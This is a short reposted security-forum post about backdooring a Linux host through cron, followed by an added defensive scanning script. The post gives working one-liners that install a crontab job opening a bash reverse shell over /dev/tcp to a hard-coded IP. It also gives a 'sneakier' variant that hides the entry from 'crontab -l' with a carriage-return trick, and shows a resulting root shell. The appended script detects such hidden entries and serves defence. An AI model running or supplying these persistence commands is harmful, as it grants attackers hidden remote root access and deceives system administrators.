z0nek


It is best to run this as an uncommonly used user account; the job is written to /var/spool/cron/$username
(crontab -l;echo ‘*/60 * * * * exec 9<> /dev/tcp/49.213.15.229/2345;exec 0<&9;exec 1>&9 2>&1&&/bin/bash –noprofile -i’)|crontab –

Upgraded, sneakier version
(crontab -l;printf “* * * * * exec 9<> /dev/tcp/49.213.15.229/2345;exec 0<&9;exec 1>&9 2>&1&&/bin/bash –noprofile -i;\rno crontab for `whoami`%100c\n”)|crontab –
crontab -l then simply prints "no crontab for $username":
[root@vincenthostname bin]# crontab -l
no crontab for root
The reverse shell connects successfully:
[vincent@iZ62luqzx5xZ src]$ ./netcat -l -p 2345
bash: no job control in this shell
[root@vincenthostname ~]# whoami
whoami
root

Reposted from: https://zone.wooyun.org/content/18244
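
A defender's check for the hiding trick shown above, as an added example that is not part of the original post: it reads crontab files raw and prints control bytes escaped, so the carriage return that blanks an entry in `crontab -l` output shows up as `^M`. The function names, the sample user alice and the address 192.0.2.10 are constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example, not from the original post: audit crontab files for entries
# hidden from `crontab -l` with terminal-control bytes, and for /dev/tcp use.
# Files are read raw and control bytes are printed escaped (cat -v: CR = ^M),
# so the terminal cannot overwrite what the scanner reports.

# scan_crontab FILE: print findings; return 1 if anything suspicious was found.
scan_crontab() {
    local file=$1 ctl findings
    # Bracket expression matching every control byte except TAB and LF.
    ctl=$(printf '[\001-\010\013-\037\177]')
    findings=$(
        LC_ALL=C grep -an "$ctl" "$file" | cat -v | sed 's/^/control-char line /'
        LC_ALL=C grep -anE '/dev/(tcp|udp)/' "$file" | cat -v | sed 's/^/socket-redirect line /'
    )
    [ -z "$findings" ] && return 0
    printf '== %s\n%s\n' "$file" "$findings"
    return 1
}

# write_sample FILE: constructed test data. Line 2 ends with CR + decoy text +
# padding, the layout the post describes; 192.0.2.10 is a documentation address.
write_sample() {
    printf '0 3 * * * /usr/local/bin/backup.sh\n' > "$1"
    printf '* * * * * exec 9<>/dev/tcp/192.0.2.10/4444;\rno crontab for alice%40s\n' '' >> "$1"
}

# Scan each file given on the command line, e.g. the per-user files under
# /var/spool/cron/ (run as root).
for f in "$@"; do scan_crontab "$f"; done
```

For a quick manual check of a single account, piping `crontab -l` through `cat -v` or `od -c` exposes the same bytes.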


Tags: backdoor
